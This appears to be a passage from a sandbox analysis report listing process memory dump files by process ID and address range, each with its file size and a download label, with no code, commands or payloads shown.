memory/244-230-0x00000000054A0000-0x0000000005580000-memory.dmp

Filesize
896KB

Download
memory/544-105-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/544-79-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/544-179-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/544-176-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/544-110-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/544-38-0x0000000004FA0000-0x0000000004FD6000-memory.dmp

Filesize
216KB

Download
memory/544-163-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/544-45-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/544-46-0x0000000005D60000-0x0000000005D82000-memory.dmp

Filesize
136KB

Download
memory/1952-126-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/1952-61-0x0000000005B10000-0x0000000005E67000-memory.dmp

Filesize
3.3MB

Download
memory/1952-50-0x0000000005AA0000-0x0000000005B06000-memory.dmp

Filesize
408KB

Download
memory/1952-47-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/1952-42-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/1952-119-0x00000000085A0000-0x0000000008B46000-memory.dmp

Filesize
5.6MB

Download
memory/1952-112-0x0000000004D50000-0x0000000004D60000-memory.dmp

Filesize
64KB

Download
memory/2028-161-0x000000001B870000-0x000000001B880000-memory.dmp

Filesize
64KB

Download
memory/2028-113-0x00007FF9E1630000-0x00007FF9E20F2000-memory.dmp

Filesize
10.8MB

Download
memory/2028-37-0x000000001B870000-0x000000001B880000-memory.dmp

Filesize
64KB

Download
memory/2028-36-0x00007FF9E1630000-0x00007FF9E20F2000-memory.dmp

Filesize
10.8MB

Download
memory/2028-35-0x0000000000B50000-0x0000000000BAC000-memory.dmp

Filesize
368KB

Download
memory/2080-175-0x0000000003150000-0x0000000003160000-memory.dmp

Filesize
64KB

Download
memory/2080-172-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/2080-49-0x0000000003150000-0x0000000003160000-memory.dmp

Filesize
64KB

Download
memory/2080-62-0x0000000003150000-0x0000000003160000-memory.dmp

Filesize
64KB

Download
memory/2080-174-0x0000000003150000-0x0000000003160000-memory.dmp

Filesize
64KB

Download
memory/2080-116-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

Filesize
104KB

Download
memory/2080-111-0x0000000003150000-0x0000000003160000-memory.dmp

Filesize
64KB

Download
memory/2080-43-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/3296-88-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/3296-44-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/3296-106-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/3296-173-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/3296-178-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/3296-114-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/3864-149-0x0000000005B50000-0x0000000005B9C000-memory.dmp

Filesize
304KB

Download
memory/3864-145-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/3864-146-0x0000000005850000-0x00000000059A6000-memory.dmp

Filesize
1.3MB

Download
memory/3864-147-0x00000000059D0000-0x0000000005B0E000-memory.dmp

Filesize
1.2MB

Download
memory/3864-142-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/3864-171-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/3864-144-0x0000000005610000-0x000000000561A000-memory.dmp

Filesize
40KB

Download
memory/3864-148-0x00000000063B0000-0x00000000064EC000-memory.dmp

Filesize
1.2MB

Download
memory/3864-143-0x0000000005650000-0x00000000056E2000-memory.dmp

Filesize
584KB

Download
memory/3864-140-0x0000000000B30000-0x0000000000C92000-memory.dmp

Filesize
1.4MB

Download
memory/3916-168-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/3916-164-0x0000000000560000-0x0000000000644000-memory.dmp

Filesize
912KB

Download
memory/3916-177-0x0000000005200000-0x00000000052D6000-memory.dmp

Filesize
856KB

Download
memory/4004-141-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/4004-57-0x00000000023E0000-0x00000000023F0000-memory.dmp

Filesize
64KB

Download
memory/4004-48-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/4004-107-0x0000000005B80000-0x0000000005B9E000-memory.dmp

Filesize
120KB

Download
memory/4004-40-0x0000000004D80000-0x00000000053AA000-memory.dmp

Filesize
6.2MB

Download
memory/4004-41-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/4400-115-0x0000000007930000-0x0000000007FAA000-memory.dmp

Filesize
6.5MB

Download
memory/4400-51-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/4400-108-0x0000000005FE0000-0x000000000602C000-memory.dmp

Filesize
304KB

Download
memory/4400-109-0x0000000004EF0000-0x0000000004F00000-memory.dmp

Filesize
64KB

Download
memory/4400-117-0x0000000007500000-0x0000000007596000-memory.dmp

Filesize
600KB

Download
memory/4400-118-0x0000000007490000-0x00000000074B2000-memory.dmp

Filesize
136KB

Download
memory/4400-125-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/4400-39-0x00000000719A0000-0x0000000072151000-memory.dmp

Filesize
7.7MB

Download
memory/4744-0-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/4744-34-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/4924-162-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/4924-169-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/4924-170-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download